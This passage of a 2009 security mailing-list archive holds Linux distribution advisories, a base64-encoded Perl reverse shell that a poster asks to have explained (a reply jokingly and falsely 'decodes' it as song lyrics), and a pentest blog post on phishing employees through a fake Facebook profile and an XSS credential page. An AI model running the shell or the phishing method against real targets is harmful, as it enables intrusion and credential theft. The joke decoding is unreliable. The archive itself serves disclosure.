"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==" Becomes: "I've had a little bit too much, much All of the people start to rush, start to rush by A dizzy twisted dance, can't find my drink, oh man Where are my keys? I lost my phone, phone What's going on on the floor? I love this record baby but I can't see straight anymore Keep it cool, what's the name of this club? I can't remember but it's alright, a-alright Just dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, d-d-d-dance Dance, dance, just, j-j-just dance Wish I could shut my playboy mouth, oh oh oh-oh How'd I turn my shirt inside out? Inside outright Control your poison babe, roses have thorns they say And we're all getting hosed tonight, oh oh oh-oh What's going on on the floor? I love this record baby but I can't see straight anymore Keep it cool, what's the name of this club? I can't remember but it's alright, a-alright Just dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, d-d-d-dance Dance, dance, just, j-j-just When I come through on the dance floor checkin' out that catalog Can't believe my eyes, so many women without a flaw And I ain't gon' give it up, steady tryin' to pick it up like a car I'ma hit it, I'ma hit it and flex and do it until tomorr' yeah Shawty I can see that you got so much energy The way you're twirlin' up them hips 'round and 'round And now there's no reason at all why you can't leave here with me In the meantime stay and let me watch you break it down And dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, d-d-d-dance Dance, dance, just, j-j-just dance Woo! Let's go! Half psychotic, sick, hypnotic Got my blueprint, it's symphonic Half psychotic, sick, hypnotic Got my blueprint electronic Half psychotic, sick, hypnotic Got my blueprint, it's symphonic Half psychotic, sick, hypnotic Got my blueprint electronic Go! Use your muscle, carve it out, work it, hustle I got it, just stay close enough to get it Don't slow! Drive it, clean it, Lysol, bleed it Spend the last dough (I got it) In your pocko (I got it) Just dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, da da doo-doo-mmm Just dance, spin that record babe, da da doo-doo-mmm Just dance, gonna be okay, d-d-d-dance Dance, dance, just, j-j-just dance" (c)opyright Fredrick Diggle Security 2009 On Tue, Feb 10, 2009 at 12:23 PM, sr. wrote: > can anyone tell me what encoding this is? > > $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj > aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR > hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT > sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI > kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi > KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl > OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; > > this has to do with old php 4.x.x version with magic quotes enabled. > i'm just trying to figure out what the connect back code does. > > any input is much appreciated. > > thx, > > sr. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From thijs at debian.org Wed Feb 11 21:44:16 2009 From: thijs at debian.org (Thijs Kinkhorst) Date: Wed, 11 Feb 2009 22:44:16 +0100 (CET) Subject: [Full-disclosure] [SECURITY] [DSA 1723-1] New phpmyadmin packages fix arbitrary code execution Message-ID: <20090211214416.210D93267E0@morgana.loeki.tv> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1723-1 security at debian.org http://www.debian.org/security/ Thijs Kinkhorst February 11, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : phpmyadmin Vulnerability : insufficient input sanitising Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-5621 Michael Brooks discovered that phpMyAdmin, a tool to administrate MySQL over the web, performs insufficient input sanitising allowing a user assisted remote attacker to execute code on the webserver. For the stable distribution (etch), this problem has been fixed in version 2.9.1.1-10. For the testing distribution (lenny) and unstable distribution (sid), this problem has been fixed in version 2.11.8.1-5. We recommend that you upgrade your phpmyadmin package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10.dsc Size/MD5 checksum: 1021 9428b84187a0fc1c893e099987f746f6 http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1.orig.tar.gz Size/MD5 checksum: 3500563 f598509b308bf96aee836eb2338f523c http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10.diff.gz Size/MD5 checksum: 54951 8441cbf454016d4425dddaef569bbd21 Architecture independent packages: http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-10_all.deb Size/MD5 checksum: 3603132 538d80062d8fc4c009e0e0e01ffbacd4 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJJk0XOAAoJECIIoQCMVaAcpM0H/Au7C8amq2N1MsPR+EaF1sPS NeYjY1pEEmnJ7Pr9u4oizb5M3V9hYqWfsr6cU+pRnwvTLP2/aYJKdUltOymFvV2T TUnvGtuHDWLswSviiaZikqRrRKGqZJfDsqTwjKU8JeuDgBU173OKawv8n+408y6X cQlgzjLiOVIyqC41aoZx9ToraBoqtI8hQQoIgV/akH/jYNa0B7Lcb456+WozJXdr ZbtJFjn22vMoT8CHp/60ysCZhy1s0hV/SNXLUlxvsjG8IKmiLcYnPz8bDe5Hnzme KXH3QjMDbtBwikWkdf2B8Z0hdpJNRpLiHQ9PG6NPPZm55/hCtoRNFtbeStVqo8M= =tnTX -----END PGP SIGNATURE----- From juha-matti.laurio at netti.fi Thu Feb 12 13:43:14 2009 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Thu, 12 Feb 2009 15:43:14 +0200 (EET) Subject: [Full-disclosure] metasploit.com = 127.0.0.1 Message-ID: <26358240.1141171234446195623.JavaMail.juha-matti.laurio@netti.fi> And Metasploit Blog confirms the DDoS too: http://blog.metasploit.com/2009/02/pathetic-ddos-vs-security-sites.html Juha-Matti From ad_lists at netragard.com Thu Feb 12 16:23:48 2009 From: ad_lists at netragard.com (Adriel T. Desautels) Date: Thu, 12 Feb 2009 11:23:48 -0500 Subject: [Full-disclosure] Facebook from a hackers perspective Message-ID: <0625647E-1921-43C8-B0A1-E946FD3FBF91@netragard.com> For those interested, here is our latest blog entry. For the past few years we've (Netragard) been using internet based Social Networking tools to hack into our customer's IT Infrastructures. This method of attack has been used by hackers since the conception of Social Networking Websites, but only recently has it caught the attention of the media. As a result of this new exposure we've decided to give people a rare glimpse into Facebook from a hackers perspective. Lets start off by talking about the internet and identity. The internet is a shapeless world where identities are not only dynamic but can't ever be verified with certainty. As a result, its easily possible to be one person one moment, then another person the next moment. This is particularly true when using internet based social networking sites like Facebook (and the rest). Humans have a natural tendency to trust each other. If one human being can provide another human with "something sufficient" then trust is earned. That "something sufficient" can be a face to face meeting but it doesn't always need to be. Roughly 90% of the people that we've targeted and successfully exploited during our social attacks trusted us because they thought we worked for the same company as them. The setup... Facebook allows its users to search for other users by keyword. Many facebook users include their place of employment in their profile. Some companies even have facebook groups that only employees or contractors are allowed to become members of. So step one is to perform reconnaissance against those facebook using employees. This can be done with facebook, or with reconnaissance tools like Maltego and pipl.com. Reconnaissance is the military term for the collection of intelligence about an enemy prior to attacking the enemy. With regards to hacking, reconnaissance can be performed against social targets (facebook, myspace, etc) and technology targets (servers, firewalls, routers, etc). Because our preferred method of attacking employees through facebook is via phishing we normally perform reconnaissance against both vectors. When setting up for the ideal attack two things are nice to have but only one is required. The first is the discovery of some sort of Cross- site Scripting vulnerability (or something else useful) in our customers website (or one of their servers). The vulnerability is the component that is not required, but is a nice to have (we can set up our own fake server if we need to). The second component is the required component, and that is the discovery of facebook profiles for employees that work for our customer (other social networking sites work just as well). In one of our recent engagements we performed detailed social and technical reconnaissance. The social reconnaissance enabled us to identify 1402 employees 906 of which used facebook. We didn't read all 906 profiles but we did read around 200 which gave us sufficient information to create a fake employee profile. The technical reconnaissance identified various vulnerabilities one of which was the Cross-site Scripting vulnerability that we usually hope to find. In this case the vulnerability existed in our customer's corporate website. Cross-site scripting ("XSS") is a kind of computer security vulnerability that is most frequently discovered in websites that do not have sufficient input validation or data validation capabilities. XSS vulnerabilities allow an attacker to inject code into a website that is viewed by other users. This injection can be done sever side by saving the injected code on the server (in a forum, blog, etc) or it can be done client side by injecting the code into a specially crafted URL that can be delivered to a victim. During our recent engagement we used a client side attack as opposed to a server side attack . We chose the client side attack because it enabled us to select only the users that we are interested in attacking. Server side attacks are not as surgical and usually affect any user who views the compromised server page. The payload that we created was designed to render a legitimate looking https secured web page that appeared to be a component of our customer's web site. When a victim clicks on the specially crafted link the payload is executed and the fake web page is rendered. In this case our fake web page was an alert that warned users that their accounts may have been compromised and that they should verify their credentials by entering them into the form provided. When the users credentials are entered the form submitted them to http://www.netragard.com and were extracted by an automated tool that we created. After the payload was created and tested we started the process of building an easy to trust facebook profile. Because most of the targeted employees were male between the ages of 20 and 40 we decided that it would be best to become a very attractive 28 year old female. We found a fitting photograph by searching google images and used that photograph for our fake Facebook profile. We also populated the profile with information about our experiences at work by using combined stories that we collected from real employee facebook profiles. Upon completion we joined the group that our customer's facebook group. Joining wasn't an issue and our request was approved in a matter of hours. Within twenty minutes of being accepted as group members, legitimate customer employees began requesting our friendship. In addition to inbound requests we made hundreds of outbound requests. Our friends list grew very quickly and included managers, executives, secretaries, interns, and even contractors. After having collected a few hundred friends, we began chatting. Our conversations were based on work related issues that we were able to collect from legitimate employee profiles. After a period of three days of conversing and sharing links, we posted our specially crafted link to our facebook profile. The title of the link was "Omitted have you seen this I think we got hacked!" Sure enough, people started clicking on the link and verifying their credentials. Ironically, the first set of credentials that we got belonged to the person that hired us in the first place. We used those credentials to access the web-vpn which in turn gave us access to the network. As it turns out those credentials also allowed us to access the majority of systems on the network including the Active Directory server, the mainframe, pump control systems, the checkpoint firewall console, etc. It was game over, the Facebook hack worked yet again. During testing we did evaluate the customer's entire infrastructure, but the results of the evaluation have been left out of this post for clarity. We also provided our customer with a solution that was unique to them to counter the Social Network threat. They've since implemented the solution and have reported on 4 other social penetration attempts since early 2008. The threat that Social Networks bring to the table affects every business and the described method of attack has an extraordinarily high success rate. Please leave your comments on the blog. Adriel T. Desautels ad_lists at netragard.com -------------------------------------- Subscribe to our blog http://snosoft.blogspot.com From security at mandriva.com Thu Feb 12 17:57:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 12 Feb 2009 18:57:01 +0100 Subject: [Full-disclosure] [ MDVSA-2009:036 ] python Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:036 http://www.mandriva.com/security/ _______________________________________________________________________ Package : python Date : February 12, 2009 Affected: Corporate 3.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Multiple integer overflows in imageop.c in the imageop module in Python 1.5.2 through 2.5.1 allow context-dependent attackers to break out of the Python VM and execute arbitrary code via large integer values in certain arguments to the crop function, leading to a buffer overflow, a different vulnerability than CVE-2007-4965 and CVE-2008-1679. (CVE-2008-4864) Multiple integer overflows in Python 2.5.2 and earlier allow context-dependent attackers to have an unknown impact via vectors related to the (1) stringobject, (2) unicodeobject, (3) bufferobject, (4) longobject, (5) tupleobject, (6) stropmodule, (7) gcmodule, and (8) mmapmodule modules. NOTE: The expandtabs integer overflows in stringobject and unicodeobject in 2.5.2 are covered by CVE-2008-5031. Multiple integer overflows in Python 2.2.3 through 2.5.1, and 2.6, allow context-dependent attackers to have an unknown impact via a large integer value in the tabsize argument to the expandtabs method, as implemented by (1) the string_expandtabs function in Objects/stringobject.c and (2) the unicode_expandtabs function in Objects/unicodeobject.c. NOTE: this vulnerability reportedly exists because of an incomplete fix for CVE-2008-2315. (CVE-2008-5031) The updated Python packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2315 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4864 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5031 _______________________________________________________________________ Updated Packages: Corporate 3.0: c9668bc25f1306f610bfdfc94b4b944c corporate/3.0/i586/libpython2.3-2.3.7-0.2.C30mdk.i586.rpm f2720b0908488c72a4591c89a5d6be6e corporate/3.0/i586/libpython2.3-devel-2.3.7-0.2.C30mdk.i586.rpm 261fbcfe8cd18a217845051c7c2fdd75 corporate/3.0/i586/python-2.3.7-0.2.C30mdk.i586.rpm 1df9dfe4bacd9982da477f84daf4179e corporate/3.0/i586/python-base-2.3.7-0.2.C30mdk.i586.rpm c848a40db3729c5d730409cc8b53ede2 corporate/3.0/i586/python-docs-2.3.7-0.2.C30mdk.i586.rpm a6844df32103497417ed829693fb60f5 corporate/3.0/i586/tkinter-2.3.7-0.2.C30mdk.i586.rpm c5f2ad7e5986ab7232658b40e8dea295 corporate/3.0/SRPMS/python-2.3.7-0.2.C30mdk.src.rpm Corporate 3.0/X86_64: 0969a75152e437953cae2c309697536c corporate/3.0/x86_64/lib64python2.3-2.3.7-0.2.C30mdk.x86_64.rpm e297c080c4ab2cd7c5f536a5cda758b2 corporate/3.0/x86_64/lib64python2.3-devel-2.3.7-0.2.C30mdk.x86_64.rpm d6ddee2f8c6bbe82acb7d5fdaaa75913 corporate/3.0/x86_64/python-2.3.7-0.2.C30mdk.x86_64.rpm 1556e502527f22fad6771d95b288b9cc corporate/3.0/x86_64/python-base-2.3.7-0.2.C30mdk.x86_64.rpm acdefbc7a2ed2dd31b6569002e4253e3 corporate/3.0/x86_64/python-docs-2.3.7-0.2.C30mdk.x86_64.rpm 49fd4e84a697d91c64ac5d91b63bf43c corporate/3.0/x86_64/tkinter-2.3.7-0.2.C30mdk.x86_64.rpm c5f2ad7e5986ab7232658b40e8dea295 corporate/3.0/SRPMS/python-2.3.7-0.2.C30mdk.src.rpm Multi Network Firewall 2.0: cabb486b4f3c24c9fea9920db0576137 mnf/2.0/i586/libpython2.3-2.3.7-0.2.M20mdk.i586.rpm 60b4f62da866083a1c37ad42d532171b mnf/2.0/i586/libpython2.3-devel-2.3.7-0.2.M20mdk.i586.rpm b5a2dc2a80a304b2095549b1d0c7c4c8 mnf/2.0/i586/python-2.3.7-0.2.M20mdk.i586.rpm 5964fa32ade61fc6d217481252e75d92 mnf/2.0/i586/python-base-2.3.7-0.2.M20mdk.i586.rpm f8eb4c23e80dc5ee7cf4abdacc0d01cc mnf/2.0/i586/python-docs-2.3.7-0.2.M20mdk.i586.rpm 8ca87fc328dd2d3c4f21edc5f244e1cc mnf/2.0/i586/tkinter-2.3.7-0.2.M20mdk.i586.rpm 6bdfd7584a2e4094ce39424311368ce8 mnf/2.0/SRPMS/python-2.3.7-0.2.M20mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJlDhYmqjQ0CJFipgRAjxAAJ9Ki28TLWrWrI/6ftj5bLVtNe4MsgCgoH19 A65A1tocyMcWLZBUV61a0KU= =UwnZ -----END PGP SIGNATURE----- From marc.deslauriers at canonical.com Thu Feb 12 19:18:14 2009 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Thu, 12 Feb 2009 14:18:14 -0500 Subject: [Full-disclosure] [USN-719-1] pam-krb5 vulnerabilities Message-ID: <1234466294.5854.1.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-719-1 February 12, 2009 libpam-krb5 vulnerabilities CVE-2009-0360, CVE-2009-0361 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: libpam-krb5 3.10-1ubuntu0.8.04.1 Ubuntu 8.10: libpam-krb5 3.10-1ubuntu0.8.10.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that pam_krb5 parsed environment variables when run with setuid applications. A local attacker could exploit this flaw to bypass authentication checks and gain root privileges. (CVE-2009-0360) Derek Chan discovered that pam_krb5 incorrectly handled refreshing existing credentials when used with setuid applications. A local attacker could exploit this to create or overwrite arbitrary files, and possibly gain root privileges. (CVE-2009-0361) Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1.diff.gz Size/MD5: 12322 2915d0d5b4133bcc65b6bc03346033b0 http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1.dsc Size/MD5: 816 cbc0e2b13d48682ec29127649d9d3407 http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10.orig.tar.gz Size/MD5: 156259 6ec6bd6637f8c91bf5386ed95fa975ba amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1_amd64.deb Size/MD5: 78068 6f201eda9f6df9d527c165c21756084d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1_i386.deb Size/MD5: 77412 199ba52d9440d89f70fab1544fa90d7f lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1_lpia.deb Size/MD5: 77246 ff9cce0bbaf03a1a348fcd1fb0ca6745 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1_powerpc.deb Size/MD5: 80536 e3ec20dbf0fb9666549f801c012f72b0 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.04.1_sparc.deb Size/MD5: 77196 6e8a12a640e6c9163d65709d68c14775 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1.diff.gz Size/MD5: 12322 9646c596627edf91af8799f78b9bffb2 http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1.dsc Size/MD5: 1234 39b9545e294f6937092fbf8316ffc9d1 http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10.orig.tar.gz Size/MD5: 156259 6ec6bd6637f8c91bf5386ed95fa975ba amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1_amd64.deb Size/MD5: 78348 9be5305e9bb4f8b85d0857230cc2acda i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1_i386.deb Size/MD5: 77494 2e37aba551e192fffaf17754b96fee1a lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1_lpia.deb Size/MD5: 77452 d89fdc271a18c000d84a2ce6c1c1db4a powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1_powerpc.deb Size/MD5: 80632 5312557a64d26867ac5472ee56f3ac2e sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libp/libpam-krb5/libpam-krb5_3.10-1ubuntu0.8.10.1_sparc.deb Size/MD5: 76978 9fc7e9ee619bd7ce77fafe13a2dc46b8 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090212/ab48ee2c/attachment.bin From marc.deslauriers at canonical.com Thu Feb 12 19:18:54 2009 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Thu, 12 Feb 2009 14:18:54 -0500 Subject: [Full-disclosure] [USN-720-1] PHP vulnerabilities Message-ID: <1234466334.5854.2.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-720-1 February 12, 2009 php5 vulnerabilities CVE-2007-3996, CVE-2007-5900, CVE-2008-3658, CVE-2008-3659, CVE-2008-3660, CVE-2008-5557, CVE-2008-5624, CVE-2008-5625, CVE-2008-5658 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libapache2-mod-php5 5.1.2-1ubuntu3.13 php5-cgi 5.1.2-1ubuntu3.13 php5-cli 5.1.2-1ubuntu3.13 php5-gd 5.1.2-1ubuntu3.13 Ubuntu 7.10: libapache2-mod-php5 5.2.3-1ubuntu6.5 php5-cgi 5.2.3-1ubuntu6.5 php5-cli 5.2.3-1ubuntu6.5 php5-gd 5.2.3-1ubuntu6.5 Ubuntu 8.04 LTS: libapache2-mod-php5 5.2.4-2ubuntu5.5 php5-cgi 5.2.4-2ubuntu5.5 php5-cli 5.2.4-2ubuntu5.5 php5-gd 5.2.4-2ubuntu5.5 Ubuntu 8.10: libapache2-mod-php5 5.2.6-2ubuntu4.1 libapache2-mod-php5filter 5.2.6-2ubuntu4.1 php5-cgi 5.2.6-2ubuntu4.1 php5-cli 5.2.6-2ubuntu4.1 php5-gd 5.2.6-2ubuntu4.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that PHP did not properly enforce php_admin_value and php_admin_flag restrictions in the Apache configuration file. A local attacker could create a specially crafted PHP script that would bypass intended security restrictions. This issue only applied to Ubuntu 6.06 LTS, 7.10, and 8.04 LTS. (CVE-2007-5900) It was discovered that PHP did not correctly handle certain malformed font files. If a PHP application were tricked into processing a specially crafted font file, an attacker may be able to cause a denial of service and possibly execute arbitrary code with application privileges. (CVE-2008-3658) It was discovered that PHP did not properly check the delimiter argument to the explode function. If a script passed untrusted input to the explode function, an attacker could cause a denial of service and possibly execute arbitrary code with application privileges. (CVE-2008-3659) It was discovered that PHP, when used as FastCGI module, did not properly sanitize requests. By performing a request with multiple dots preceding the extension, an attacker could cause a denial of service. (CVE-2008-3660) It was discovered that PHP did not properly handle Unicode conversion in the mbstring extension. If a PHP application were tricked into processing a specially crafted string containing an HTML entity, an attacker could execute arbitrary code with application privileges. (CVE-2008-5557) It was discovered that PHP did not properly initialize the page_uid and page_gid global variables for use by the SAPI php_getuid function. An attacker could exploit this issue to bypass safe_mode restrictions. (CVE-2008-5624) It was dicovered that PHP did not properly enforce error_log safe_mode restrictions when set by php_admin_flag in the Apache configuration file. A local attacker could create a specially crafted PHP script that would overwrite arbitrary files. (CVE-2007-5625) It was discovered that PHP contained a flaw in the ZipArchive::extractTo function. If a PHP application were tricked into processing a specially crafted zip file that had filenames containing "..", an attacker could write arbitrary files within the filesystem. This issue only applied to Ubuntu 7.10, 8.04 LTS, and 8.10. (CVE-2008-5658) USN-557-1 fixed a vulnerability in the GD library. When using the GD library, PHP did not properly handle the return codes that were added in the security update. An attacker could exploit this issue with a specially crafted image file and cause PHP to crash, leading to a denial of service. This issue only applied to Ubuntu 6.06 LTS, and 7.10. (CVE-2007-3996) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.13.diff.gz Size/MD5: 136172 36d74530cd6425b824aca441313ed346 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.13.dsc Size/MD5: 1776 02fd1bc0edafb5cbb9c79f59b731e3b2 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2.orig.tar.gz Size/MD5: 8064193 b5b6564e8c6a0d5bc1d2b4787480d792 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.1.2-1ubuntu3.13_all.deb Size/MD5: 301950 7e2ab3ef12e6da932f0ac73fd146fdf5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.13_all.deb Size/MD5: 1040 5a05c841f86752bfa494099af06a972d amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 2434690 445924f3d8b7d220d6ad6f63bd6ca42a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 4758492 2fd749aa61a449bed58b6ef8b84015cd http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 2390194 f9e8022d83eb1cb31af82f33fd02ab77 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 136268 d59a233d6d7312d666e0e23606b197ed http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 24622 2ff8ff5729acaa80076aea734bcdee21 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 312642 6e24091ae7aaa47263da531a5a2bf166 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 36844 4974ce36d97755f9f413698b0067e156 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 22140 4c69a7739a7a79e3f0e2bcc92b6b0f06 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 8790 2d3f59432e04d90eb3ebfc1e73d00844 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.13_amd64.deb Size/MD5: 25238 